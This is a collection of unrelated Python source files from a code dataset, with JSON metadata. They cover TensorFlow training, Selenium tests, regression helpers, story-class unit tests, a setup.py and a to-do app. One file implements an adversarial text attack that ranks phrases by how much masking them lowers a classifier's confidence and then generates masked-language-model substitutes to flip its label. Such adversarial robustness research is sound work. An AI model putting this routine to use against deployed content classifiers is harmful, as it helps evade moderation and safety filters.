tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), \n num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.string, tf.string])), num_parallel_calls=2)), cycle_length=2) \n dataset = dataset.shuffle(buffer_size=4000, seed=seed)\n batched_dataset = dataset.batch(batch_size)\n\n return batched_dataset.make_initializable_iterator()\n\n\n\n\n\n\ndef run():\n #num_classes = 3\n #num_classes = 85\n num_classes = 4\n image_shape = (576,160)\n data_dir = '/home/shared/datasets/bird_eye_view/kitti/'\n runs_dir = './runs_bev_kitti'\n #filenames = [\"/home/shared/datasets/kitti_road/data_road/training/training.txt\"]\n #filenames_gt = [\"/home/shared/datasets/kitti_road/data_road/training/gt_training.txt\"]\n filenames = [\"/home/luis2r/Desktop/cnn-for-curb-segmentation/vgg_depth/trainin_bev_kitti_car_people_bici.txt\"]\n #filenames_gt = [\"/home/luis2r/rob_devkit/depth/KITTI/kitti_train_depth_maps.txt\"}\n # data_folder = \"/home/shared/datasets/kitti_road/data_road/training\"\n # filenames = 
glob(os.path.join(data_folder, 'image_2', '*.png'))\n # filenames = tf.constant(filenames)\n # labels = glob(os.path.join(data_folder, 'gt_image_2', '*_road_*.png'))\n # labels = tf.constant(labels)\n # print(labels)\n\n ########################################################### random.shuffle(filenames)\n\n #tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper2_bev.maybe_download_pretrained_vgg(data_dir)\n\n #epochs = 50\n epochs= 50\n batch_size = 32\n num_shards = 12\n #seed = None\n\n\n\n\n #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n\n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n\n #dataset = dataset.shuffle(buffer_size=10000, seed=20)\n\n\n #dataset = tf.data.TextLineDataset(filenames)\n #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n\n #batched_dataset = dataset.batch(batch_size)\n\n\n\n\n #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n #dataset = dataset.shuffle(buffer_size=10000)\n #batched_dataset = dataset.batch(batch_size)\n #iterator = batched_dataset.make_one_shot_iterator()\n #iterator = batched_dataset.make_initializable_iterator()\n \n seed = tf.placeholder(tf.int64, shape=())\n\n iterator = input_pipeline(filenames, batch_size, num_shards, seed)\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n\n #get_batches_fn = helper2.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n\n\n\n\n # TF placeholders\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n\n nn_last_layer = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(nn_last_layer, correct_label, learning_rate, num_classes)\n\n # TODO: Train NN using the train_nn function\n\n #train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate)\n train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator, seed)\n\n # TODO: Save inference data using helper2_bev_bev.save_inference_samples\n helper2_bev.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n 
run()\n","sub_path":"vgg_depth/main_bev.py","file_name":"main_bev.py","file_ext":"py","file_size_in_byte":27222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"52090515","text":"\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Utilites.BaseClass import BaseClass\n\n\nclass testone(BaseClass):\n\n def test_End2End(self):\n products = self.driver.find_elements_by_css_selector(\"div[class='card h-100']\")\n for product in products:\n Productname = product.find_element_by_xpath(\"div/h4/a\").text\n if Productname == \"Blackberry\":\n product.find_element_by_xpath(\"div/button\").click()\n\n self.driver.find_element_by_class_name(\"btn-primary\").click()\n self.driver.find_element_by_class_name(\"btn-success\").click()\n\n self.driver.find_element_by_id(\"country\").send_keys('ind')\n\n wait = WebDriverWait(self.driver, 7)\n wait.until(EC.presence_of_element_located((By.LINK_TEXT, \"India\")))\n self.driver.find_element_by_link_text(\"India\").click()\n\n self.driver.find_element_by_xpath(\"//div[@class='checkbox checkbox-primary']\").click()\n self.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n\n textmessage = self.driver.find_element_by_css_selector(\".alert-success\").text\n\n assert \"Success!\" in textmessage\n\n self.driver.get_screenshot_as_file(\"abhishek.png\")\n","sub_path":"pythonProject/Frameworkdev/Tests/test_End2End.py","file_name":"test_End2End.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"414695017","text":"from pprint import pprint\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, SequentialSampler, TensorDataset\n\nfrom model.tokenizer import get_filtered_k_phrases, filter_unwanted_phrases\n\ndef get_phrase_masked_list(text, sorted_phrase_offsets, sorted_n_words_in_phrase):\n \"\"\"retrieve phrase masked list.\n Args:\n text [str]: original text\n sorted_phrase_offsets List[tuple(start, end), ...]: sorted offsets by importance\n sorted_n_words_in_phrase List[int]: sorted number of words in phrases\n Returns:\n phrase_masked_list: len(phrase_masked_list) == len(sorted_n_words_in_phrase)\n for each phrase in the list, 1 < len(list_of_masked_text) < n_words_in_phrase\n \"\"\"\n phrase_masked_list = []\n # this triple for loop would be super slow\n # TODO: figure a way to optimize it\n for i, (n, (start, end)) in enumerate(zip(sorted_n_words_in_phrase, sorted_phrase_offsets)):\n phrase_masked_list.append([])\n for n_mask in range(1, n+1):\n # make sure there are spaces around it\n mask_text = f\" {' '.join(['[MASK]'] * n_mask)} \"\n phrase_masked_list[i].append(text[:start] + mask_text + text[end:])\n\n return phrase_masked_list\n\n\n# return units masked with UNK at each position in the sequence\ndef get_unk_masked(text, phrase_offsets, filtered_indices):\n masked_units = []\n for i in filtered_indices:\n start, end = phrase_offsets[i]\n masked_units.append(text[:start] + '[UNK]' + text[end:])\n # list of masked basic units\n return masked_units\n\n\ndef get_important_scores(\n masked_phrases,\n tokenizer,\n target_model,\n orig_label,\n max_prob,\n orig_probs,\n device,\n batch_size=1,\n max_length=512\n):\n \"\"\"compute importance scores based on the target model\n This function 
takes in the tokens from the original text, and the target model,\n and compute the difference with the original probs if each token is masked with [UNK].\n Args:\n text: the original text\n phrase_offsets: a list of tuples indicating the start and end of a phrase.\n filtered_indices: a list of indices \n tokenizer: a BERT tokenizer to be used with the target model.\n target_model: a fine-tuned BERT model for sentiment analysis.\n orig_label: the original label of the text.\n max_prob: the maximum probability from the original probability output.\n orig_probs: the set of original probability outputted from the target model.\n device: the device to move around the tensors and models.\n batch_size: the batch size of the input.\n max_length: the maximum length to keep in the original text.\n Returns:\n import_scores: a torch tensor with dim (len(masked_phrases),)\n \"\"\"\n\n encoded = tokenizer(masked_phrases,\n truncation=True,\n padding='max_length',\n max_length=max_length,\n return_token_type_ids=False,\n return_tensors=\"pt\")\n\n inputs = torch.cat([encoded['input_ids'].unsqueeze(0), encoded['attention_mask'].unsqueeze(0)]).to(device)\n inputs = inputs.permute(1, 0, 2).unsqueeze(2)\n leave_1_logits = [target_model(*data).logits for data in inputs]\n\n # turn into tensor\n leave_1_logits = torch.cat(leave_1_logits, dim=0)\n leave_1_probs = torch.softmax(leave_1_logits, dim=-1) # dim: (len(masked_phrases), num_of_classes)\n leave_1_labels = torch.argmax(leave_1_probs, dim=-1) # dim: len(masked_phrases)\n\n import_scores = (max_prob\n - leave_1_probs[:, orig_label] # how the probability of original label decreases\n +\n (leave_1_labels != orig_label).float() # new label not equal to original label\n *\n (leave_1_probs.max(dim=-1)[0] - torch.index_select(orig_probs, 0, leave_1_labels))\n ) # probability of changed label\n\n return import_scores, leave_1_labels\n\n\ndef get_substitutes(top_k_ids, tokenizer, mlm_model, device):\n \"\"\"get_substitutes find the set of substitution candidates using perplexity.\n Limitation: due to the lack of GPU memory, we set a threshold\n Args:\n top_k_ids: top k ids from the mlm model, tensor (1, n_masks, k)\n tokenizer: Bert Tokenizer\n mlm_model: mlm model\n device: where to transfer the data\n Returns:\n candidates_list: list of list of candidates ranked by perplexity\n \"\"\"\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n # here we need to get permutation of top k ids\n # because we have no idea what combination fits the most\n\n # assuming first dimension is 1\n #top_k_ids = top_k_ids.squeeze()\n # print(top_k_ids)\n # https://stackoverflow.com/questions/1208118\n meshgrid = [tensor.unsqueeze(0) for tensor in torch.meshgrid(*top_k_ids)]\n ids_comb = torch.cat(meshgrid).T.reshape(-1, len(top_k_ids)).unique(dim=-1) \\\n if len(top_k_ids.shape) != 1 else top_k_ids.unsqueeze(0).T\n # print(ids_comb)\n # print(top_k_ids)\n # print(ids_comb)\n\n # set a threshold\n # TODO: we should select combinations instead of this simple cut\n ids_comb = ids_comb[:24]\n\n # compute perplexity\n N, L = ids_comb.size()\n logits = mlm_model(ids_comb)[0]\n ppl = c_loss(logits.view(N*L, -1), ids_comb.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # sort candidates\n sorted_indices = torch.argsort(ppl)\n sorted_token_ids_list = torch.index_select(ids_comb, 0, sorted_indices).tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n # 
necessary to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n\n return candidates_list\n\ndef get_phrase_substitutes(input_ids, attention_mask, mask_token_index, stop_words, tokenizer, mlm_model, device, beam_width=10, K=6):\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n word_positions = len(mask_token_index)\n query_num = 0\n \n masked_logits = mlm_model(input_ids, attention_mask).logits\n query_num += len(input_ids)\n \n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[0])\n \n # top_ids has a beam_width number of word combinations with smallest perplexities\n # the initial candidates are the beam_width number of words with the highest logits\n top_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n\n #_, sorted_ids = torch.sort(masked_logits[0,0], dim=-1, descending=True)\n #filtered_ids = get_filtered_k_phrases(sorted_ids, tokenizer, stop_words, K)\n\n #initialize candidates pool with the top k candidates at the first position\n candidate_ids = top_ids.T.to(device)\n \n for p in range(1, word_positions):\n new_inputs = input_ids.repeat(len(candidate_ids), 1)\n new_inputs[:, mask_token_index[:p]] = candidate_ids\n \n masked_logits = mlm_model(new_inputs, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[p])\n query_num += len(new_inputs)\n \n top_ids = torch.topk(masked_logits, beam_width, dim=-1).indices\n \n repeated_cands = candidate_ids.unsqueeze(1).repeat(1, beam_width, 1).reshape(-1,p)\n repeated_new_cands = top_ids.squeeze().reshape(-1, 1)\n \n # cur_options = (beam_width, beam_width)\n cur_options = torch.cat((repeated_cands, repeated_new_cands), 1)\n \n N, L = cur_options.size()\n logits = mlm_model(cur_options)[0]\n query_num += len(cur_options)\n\n ppl = c_loss(logits.view(N*L, -1), cur_options.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # the smaller the perplexity, the more coherent the sequence is\n sorted_indices = torch.argsort(ppl)[:K]\n candidate_ids = torch.index_select(cur_options, 0, sorted_indices)\n \n sorted_token_ids_list = candidate_ids.tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n \n # necessary step to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n \n \n return candidates_list, query_num\n\ndef get_word_substitutes(input_ids, attention_mask, mask_token_index, tokenizer, mlm_model, K=8, threshold=3.0):\n masked_logits = mlm_model(input_ids, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index)\n \n top_k_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n #print(masked_logits.shape)\n #print(top_k_ids.shape)\n #print(mask_token_index)\n substitute_scores = masked_logits[0,0][top_k_ids][0]\n substitute_ids = top_k_ids[0]\n \n words = []\n for (i, score) in zip(substitute_ids, substitute_scores):\n if threshold != 0 and score < threshold:\n break\n words.append([tokenizer._convert_id_to_token(int(i))])\n \n return words\n","sub_path":"model/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421680653","text":"\r\nfrom setuptools import setup, 
find_packages\r\n\r\nprint(find_packages())\r\nsource_packages = [\t\"vtandem\", \\\r\n\t\t\t\t\t\"vtandem.dft\", \\\r\n\t\t\t\t\t\"vtandem.visualization\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary.quaternary_scripts\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary.ternary_scripts\"\r\n\t\t\t\t\t]\r\nsource_image_files = [ \t(\"logo\", (\"logo/LogoLong.png\", \"logo/LogoSmall.png\")),\r\n\t\t\t\t\t\t(\"icon\", (\"icon/FolderBrowserIcon.png\", \"icon/QuestionIcon.png\"))\r\n\t\t\t\t\t\t]\r\n\r\nsetup(\r\n\tname = \"vtandem\",\r\n\tversion = \"2019.07.24\",\r\n\tdescription = \"\",\r\n\tauthor = \"Michael Y. Toriyama, Jiaxing Qu, Lidia C. Gomes, Elif Ertekin\",\r\n\tauthor_email = \"mathtoriyama@gmail.com\",\r\n\turl = \"\",\r\n\tpackages = source_packages,\r\n\tdata_files = source_image_files,\r\n\tpy_modules = [\"vtandem\"],\r\n\tentry_points = {\r\n\t\t\"console_scripts\": [\r\n\t\t\t\"vtandem = vtandem.vtandem:vtandem\"\r\n\t\t]\r\n\t},\r\n)\r\n\r\n\r\n\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"562328590","text":"from sklearn import linear_model\nimport pandas as pd\nimport sys\nsys.path.append('../')\nfrom lib.prediction import show_trajectories\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndef learn_and_show_no_test(regressor_x, regressor_y, data_to_learn, trajectory):\n \"\"\"\n\n :param regressor_x: regressor for x coordinate\n :param regressor_y: regressor for y coordinate\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return: predicted trajectory\n \"\"\"\n regressor_x.fit(data_to_learn, trajectory.x)\n regressor_y.fit(data_to_learn, trajectory.y)\n # making prredictions\n predictions_x = regressor_x.predict(data_to_learn)\n predictions_y = regressor_y.predict(data_to_learn)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': data_to_learn.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n _ = plt.plot(trajectory.x.values, trajectory.y.values, c='blue', label='Trajectory')\n _ = plt.plot(trajectory_pred.x.values, trajectory_pred.y.values, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('predicted and test trajectorys')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n # if we are working with linear regressor from sklearn lwe are to look at coefficients\n if str(type(regressor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, regressor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, regressor_y.coef_):\n print(pair)\n\n figure, scores = show_trajectories(trajectory, trajectory_pred)\n print(scores)\n\n return trajectory_pred\n\n\ndef learn_test_train(predictor_x, predictor_y, shuffle, test_size, data_to_learn, trajectory):\n \"\"\"\n the function learn given predictors on data_to_learn. to make tests we use sklearn test_train_split\n and test_size and Shuffle are to be given\n :param predictor_x: regressor for x coordinate\n :param predictor_y: regressor for y coordinate\n :param shuffle: should we shuffle the test? 
(True/False)\n :param test_size: test size from [0, 1]\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return:\n \"\"\"\n (X_train,\n X_test,\n x_train, x_test) = train_test_split(data_to_learn, trajectory.x,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n (Y_train,\n Y_test,\n y_train, y_test) = train_test_split(data_to_learn, trajectory.y,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n\n predictor_x.fit(X_train, x_train)\n predictor_y.fit(Y_train, y_train)\n\n predictions_x = predictor_x.predict(X_test)\n predictions_y = predictor_y.predict(Y_test)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n d = {'x': x_test,\n 'y': y_test,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_test = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n if str(type(predictor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, predictor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, predictor_y.coef_):\n print(pair)\n # the plotter given by authors can't deal with shuffled data\n _ = plt.scatter(x_test, y_test, s=0.5, c='blue', label='Test')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('test and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n _ = plt.scatter(x_train, y_train, s=1, c='red', label='Train')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='green', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('train and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n figure, scores = show_trajectories(trajectory_test, trajectory_pred)\n print(scores)\n\n","sub_path":"trajectory_prediction/lib/learning_and_testing.py","file_name":"learning_and_testing.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583188772","text":"\"\"\"This module tests logic for the FormalStory clas.\"\"\"\nimport unittest\nfrom ..formal_story import FormalStory\nfrom .. 
import load_from\n\n\nclass FormalStoryTests(unittest.TestCase):\n \"\"\"Test cases for the FormalStory class.\"\"\"\n\n # MARK: FormalStory.__init__()\n\n def test_000_000_ShouldCreateInstanceOfFormalStory(self):\n story = FormalStory()\n self.assertTrue(type(story) is FormalStory)\n\n # MARK: (FormalStory).role\n\n def test_100_000_ShouldHaveNilRoleProperty(self):\n story = FormalStory()\n self.assertIsNone(story.role)\n\n def test_100_010_ShouldSetAndReturnRolePropertyAsString(self):\n story = FormalStory()\n arb_role = 'some arbitrary role'\n story.role = arb_role\n self.assertEqual(story.role, arb_role)\n\n def test_100_020_ShouldRaiseErrorOnSetRoleToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.role = 56\n\n # MARK: (FormalStory).means\n\n def test_200_000_ShouldHaveNilMeansProperty(self):\n story = FormalStory()\n self.assertIsNone(story.means)\n\n def test_200_010_ShouldSetAndReturnMeansPropertyAsString(self):\n story = FormalStory()\n arb_means = 'some arbitrary means'\n story.means = arb_means\n self.assertEqual(story.means, arb_means)\n\n def test_200_020_ShouldRaiseErrorOnSetMeansToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.means = 56\n\n # MARK: (FormalStory).ends\n\n def test_300_000_ShouldHaveNilEndsProperty(self):\n story = FormalStory()\n self.assertIsNone(story.ends)\n\n def test_300_010_ShouldSetAndReturnEndsPropertyAsList(self):\n story = FormalStory()\n arb_ends = ['can eat popcorn', 'can continue to live']\n story.ends = arb_ends\n self.assertEqual(story.ends, arb_ends)\n\n def test_300_020_ShouldRaiseErrorOnSetEndsToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.ends = 56\n\n # MARK: (FormalStory).confirmations\n\n def test_400_000_ShouldHaveNilConfirmationsProperty(self):\n story = FormalStory()\n self.assertIsNone(story.confirmations)\n\n def test_400_010_ShouldSetAndReturnConfirmationsPropertyAsList(self):\n story = FormalStory()\n arb_confirmations = ['yes', 'yee', 'yep']\n story.confirmations = arb_confirmations\n self.assertEqual(story.confirmations, arb_confirmations)\n\n def test_400_020_ShouldRaiseErrorOnSetConfirmationsToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.confirmations = 56\n\n # MARK: (FormalStory).__repr__()\n\n def test_500_000_ShouldReturnStringOfEmptyStory(self):\n story = FormalStory()\n expected = \"\"\"FormalStory:\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_010_ShouldReturnStringOfStoryWithId(self):\n story = FormalStory()\n story.id = 'S000'\n expected = \"\"\"FormalStory:\nid: S000\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_020_ShouldReturnStringOfStoryWithEverythingFromSuper(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. 
time (h): 5.5\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_030_ShouldReturnStringOfStoryWithEverything(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n story.role = 'User'\n story.means = 'to create stories'\n story.ends = ['organize', 'manage', 'test', 'archive']\n story.confirmations = ['its awesome']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. time (h): 5.5\nAs a User, I want to create stories so that I can:\n* organize\n* manage\n* test\n* archive\nconfirmations:\n* its awesome\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_040_ShouldReturnStringOfStoryWithoutEnds(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n story.role = 'User'\n story.means = 'to create stories'\n story.confirmations = ['its awesome']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. time (h): 5.5\nAs a User, I want to create stories\nconfirmations:\n* its awesome\"\"\"\n self.assertEqual(expected, str(story))\n\n # MARK: (FormalStory).as_dict\n\n def test_600_000_ShouldReturnEmptyDict(self):\n story = FormalStory()\n self.assertEqual({}, story.as_dict)\n\n def test_600_010_ShouldReturnDictWithIDAndName(self):\n story = FormalStory()\n story.id = 'i'\n story.name = 'n'\n self.assertEqual({'_id': 'i', '_name': 'n'}, story.as_dict)\n\n def test_600_020_ShouldReturnDictWithSubStory(self):\n story = FormalStory()\n sub = FormalStory()\n sub.id = 'i'\n story.sub_stories = [sub]\n expected = {\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i'}\n ]\n }\n }\n self.assertEqual(expected, story.as_dict)\n\n def test_600_030_ShouldReturnDictWithSubSubStory(self):\n story = FormalStory()\n sub = FormalStory()\n sub.id = 'i1'\n story.sub_stories = [sub]\n subsub = FormalStory()\n subsub.id = 'i2'\n sub.sub_stories = [subsub]\n\n expected = {\n '_sub_stories': {\n \"FormalStory\": [\n {\n '_id': 'i1',\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i2'}\n ]\n }\n }\n ]\n }\n }\n self.assertEqual(expected, story.as_dict)\n\n # MARK: load_from\n\n def test_700_000_ShouldLoadFromEmptyDict(self):\n story = load_from('FormalStory', {})\n self.assertEqual({}, story.as_dict)\n\n def test_700_010_ShouldLoadFromDictWithIDAndName(self):\n serial_dict = {'_id': 'i', '_name': 'n'}\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n\n def test_700_020_ShouldLoadFromDictWithSubStory(self):\n serial_dict = {\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i'}\n ]\n }\n }\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n self.assertEqual('i', story.sub_stories[0].id)\n self.assertEqual('FormalStory', type(story.sub_stories[0]).__name__)\n\n def test_700_030_ShouldLoadFromDictWithSubSubStory(self):\n serial_dict = {\n '_sub_stories': {\n \"FormalStory\": [\n {\n '_id': 'i1',\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i2'}\n ]\n }\n }\n ]\n }\n }\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n self.assertEqual('i1', story.sub_stories[0].id)\n self.assertEqual('FormalStory', type(story.sub_stories[0]).__name__)\n 
self.assertEqual('i2', story.sub_stories[0].sub_stories[0].id)\n self.assertEqual('FormalStory',\n type(story.sub_stories[0].sub_stories[0]).__name__)\n self.assertEqual(serial_dict, story.as_dict)\n","sub_path":"src/model/stories/tests/test_formal_story.py","file_name":"test_formal_story.py","file_ext":"py","file_size_in_byte":8405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"447273364","text":"from tkinter import *\r\nfrom tkinter.font import Font\r\nfrom tkinter import filedialog\r\nimport pickle\r\n\r\nroot = Tk()\r\nroot.title('To Do List!')\r\nroot.iconbitmap(\"F:/Python/To_Do/icons/ico.ico\")\r\nroot.geometry(\"550x500+650+250\")\r\n\r\n# Шрифт\r\nmy_font = Font(\r\n family=\"Gabriola\",\r\n size=25,\r\n weight=\"bold\")\r\n\r\n# Создаем рамку\r\nmy_frame = Frame(root)\r\nmy_frame.pack(pady=10)\r\n\r\n# Создаем список\r\nmy_list = Listbox(my_frame,\r\n font=my_font,\r\n width=38,\r\n height=5,\r\n bg=\"SystemButtonFace\",\r\n bd=0,\r\n fg=\"#464646\",\r\n highlightthickness=0,\r\n selectbackground=\"#a6a6a6\",\r\n activestyle=\"none\")\r\n\r\nmy_list.pack(side=LEFT, fill=BOTH)\r\n\r\nstuff = [\"Список дел\", \"Сходить в магазин\", \"Выпить витамины\"]\r\n\r\nfor item in stuff:\r\n my_list.insert(END, item)\r\n\r\n# Создаем колесо прокрутки\r\nmy_scrollbar = Scrollbar(my_frame)\r\nmy_scrollbar.pack(side=RIGHT, fill=Y)\r\n\r\n# Добавляем прокрутку\r\nmy_list.config(yscrollcommand=my_scrollbar.set)\r\nmy_scrollbar.config(command=my_list.yview)\r\n\r\n# Создаем поле ввода\r\nmy_entry = Entry(root, font=(\"Helvetica\", 24))\r\nmy_entry.pack(pady=20)\r\n\r\n# Создаем кнопки и рамки\r\nbutton_frame = Frame(root)\r\nbutton_frame.pack(pady=20)\r\n\r\n# Функции\r\ndef add_item():\r\n my_list.insert(END, my_entry.get())\r\n my_entry.delete(0, END)\r\n\r\ndef delete_item():\r\n my_list.delete(ANCHOR)\r\n\r\ndef cross_off_item():\r\n my_list.itemconfig(\r\n my_list.curselection(),\r\n fg=\"#dedede\")\r\n my_list.select_clear(0, END)\r\n\r\ndef uncross_item():\r\n my_list.itemconfig(\r\n my_list.curselection(),\r\n fg=\"#464646\")\r\n my_list.select_clear(0, END)\r\n\r\ndef delete_crossed():\r\n count = 0\r\n while count < my_list.size():\r\n if my_list.itemcget(count, \"fg\") == \"#dedede\":\r\n my_list.delete(my_list.index(count))\r\n else:\r\n count += 1\r\n\r\ndef save_list():\r\n file_name = filedialog.asksaveasfilename(\r\n initialdir=\"F:/Python/To_Do/data\",\r\n title=\"Save File\",\r\n filetypes=(\r\n (\"Dat Files\", \"*.dat\"),\r\n (\"All Files\", \"*.*\"))\r\n )\r\n if file_name:\r\n if file_name.endswith(\".dat\"):\r\n pass\r\n else:\r\n file_name = f'{file_name}.dat'\r\n\r\n # Удаление 